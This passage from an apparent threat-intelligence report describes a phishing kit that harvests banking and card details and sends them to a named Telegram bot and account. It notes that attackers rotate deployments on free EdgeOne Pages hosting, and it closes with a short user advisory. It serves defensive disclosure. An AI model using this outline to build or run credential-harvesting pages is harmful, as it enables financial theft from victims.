The page claims this information is required for secure verification. Once submitted, all entered banking and card details are exfiltrated to Telegram using the goldenxspy_bot, with the data delivered to the Telegram user prabhatspy.

This confirms that the second template is not just payment fraud but a full scale financial credential harvesting operation.

Abuse of Free Hosting Platforms

Multiple variants of these phishing templates were observed hosted on EdgeOne Pages, which provides free hosting. This allows attackers to deploy and rotate phishing pages rapidly with minimal effort.

Across different deployments, the visual structure and JavaScript logic remain largely the same, while UPI IDs, mobile numbers, and Telegram bots change.

URLScan analysis shows multiple deployments of the same phishing kit, with identical client-side JavaScript logic and minor configuration changes such as UPI IDs, Telegram bots, and subdomain names.


User Advisory

Awareness and verification remain the most effective defenses against payment based phishing and fraud.